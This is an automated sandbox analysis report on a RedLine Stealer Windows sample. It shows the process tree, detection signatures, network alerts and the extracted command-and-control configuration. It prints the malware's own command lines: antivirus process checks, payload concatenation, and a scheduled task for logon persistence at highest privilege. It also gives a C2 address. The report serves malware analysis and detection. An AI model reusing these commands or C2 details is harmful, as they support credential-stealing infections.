Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe

Overview

General Information

Sample name:f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
Analysis ID:1483220
MD5:284bba6223d9215b7b1f9b99480ad2cd
SHA1:5fd4f669024dce37ae01d3976d247d599c5e7f8e
SHA256:f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b01582d140d17d8131f658d
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found stalling execution ending in API Sleep call
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe (PID: 4304 cmdline: "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe" MD5: 284BBA6223D9215B7B1F9B99480AD2CD)
    • cmd.exe (PID: 5884 cmdline: "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 4448 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3580 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5632 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6136 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1308 cmdline: cmd /c md 723582 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 4180 cmdline: findstr /V "wagemissileaffiliatesgreeting" Fisting MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6848 cmdline: cmd /c copy /b Restriction + Manager + Screw + Anchor 723582\r MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Flash.pif (PID: 4368 cmdline: 723582\Flash.pif 723582\r MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • schtasks.exe (PID: 5520 cmdline: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 5420 cmdline: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • timeout.exe (PID: 6284 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 6768 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ApolloSphere.pif (PID: 2952 cmdline: "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pif" "C:\Users\user\AppData\Local\EduTech Dynamics\L" MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "88.99.151.68:7200", "Bot Id": "linkedin721", "Authorization Header": "147e49efa850c08896c9699376e24ce5"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.3256409691.000000000141A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    0000000B.00000002.3256254115.0000000001350000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      0000000B.00000003.3249041675.00000000030D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000B.00000003.3249083801.000000000139B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000B.00000002.3256579902.00000000014CB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 5 entries

            System Summary

            barindex
            Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, ParentCommandLine: 723582\Flash.pif 723582\r, ParentImage: C:\Users\user\AppData\Local\Temp\723582\Flash.pif, ParentProcessId: 4368, ParentProcessName: Flash.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, ProcessId: 5420, ProcessName: RegAsm.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 723582\Flash.pif 723582\r, ParentImage: C:\Users\user\AppData\Local\Temp\723582\Flash.pif, ParentProcessId: 4368, ParentProcessName: Flash.pif, ProcessCommandLine: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 5520, ProcessName: schtasks.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js", ProcessId: 6768, ProcessName: wscript.exe
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 723582\Flash.pif 723582\r, CommandLine: 723582\Flash.pif 723582\r, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\723582\Flash.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\723582\Flash.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\723582\Flash.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5884, ParentProcessName: cmd.exe, ProcessCommandLine: 723582\Flash.pif 723582\r, ProcessId: 4368, ProcessName: Flash.pif
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, ParentCommandLine: 723582\Flash.pif 723582\r, ParentImage: C:\Users\user\AppData\Local\Temp\723582\Flash.pif, ParentProcessId: 4368, ParentProcessName: Flash.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\723582\RegAsm.exe, ProcessId: 5420, ProcessName: RegAsm.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 723582\Flash.pif 723582\r, ParentImage: C:\Users\user\AppData\Local\Temp\723582\Flash.pif, ParentProcessId: 4368, ParentProcessName: Flash.pif, ProcessCommandLine: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 5520, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe", ParentImage: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, ParentProcessId: 4304, ParentProcessName: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exit, ProcessId: 5884, ProcessName: cmd.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 723582\Flash.pif 723582\r, ParentImage: C:\Users\user\AppData\Local\Temp\723582\Flash.pif, ParentProcessId: 4368, ParentProcessName: Flash.pif, ProcessCommandLine: schtasks.exe /create /tn "ApolloSphere" /tr "wscript //B 'C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 5520, ProcessName: schtasks.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.js", ProcessId: 6768, ProcessName: wscript.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Surgeons Surgeons.cmd & Surgeons.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5884, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 6136, ProcessName: findstr.exe
            No Snort rule has matched
            Timestamp:2024-07-26T21:12:55.216657+0200
            SID:2022930
            Source Port:443
            Destination Port:49715
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-26T21:12:17.026947+0200
            SID:2022930
            Source Port:443
            Destination Port:49707
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 0000000B.00000002.3256409691.000000000141A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "88.99.151.68:7200", "Bot Id": "linkedin721", "Authorization Header": "147e49efa850c08896c9699376e24ce5"}
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeReversingLabs: Detection: 66%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000014.00000000.3250004113.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.11.dr
            Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000014.00000000.3250004113.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.11.dr
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
            Source: C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00A34005
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00A3494A
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00A33CE2
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00A3C2FF
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00A3CD9F
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3CD14 FindFirstFileW,FindClose,11_2_00A3CD14
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00A3F5D8
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00A3F735
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00A3FA36
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001E4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_001E4005
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001E494A GetFileAttributesW,FindFirstFileW,FindClose,16_2_001E494A
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001EC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_001EC2FF
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001ECD14 FindFirstFileW,FindClose,16_2_001ECD14
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001ECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,16_2_001ECD9F
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001EF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_001EF5D8
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001EF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_001EF735
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001EFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,16_2_001EFA36
            Source: C:\Users\user\AppData\Local\EduTech Dynamics\ApolloSphere.pifCode function: 16_2_001E3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_001E3CE2

            Networking

            barindex
            Source: Malware configuration extractorURLs: 88.99.151.68:7200
            Source: unknownDNS traffic detected: query: RADgSUbEiddPOZAFcUYmDkmxSjP.RADgSUbEiddPOZAFcUYmDkmxSjP replaycode: Name error (3)
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Temp\723582\Flash.pifCode function: 11_2_00A429BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,11_2_00A429BA
            Source: global trafficDNS traffic detected: DNS query: RADgSUbEiddPOZAFcUYmDkmxSjP.RADgSUbEiddPOZAFcUYmDkmxSjP
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://ocsp.sectigo.com0
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe, 00000000.00000003.2025611009.0000000002835000.00000004.00000020.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.2078132463.0000000003B9A000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000002.3257234453.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, Flash.pif, 0000000B.00000003.3247044390.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, Confidentiality.0.dr, ApolloSphere.pif.11.dr, Flash.pif.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
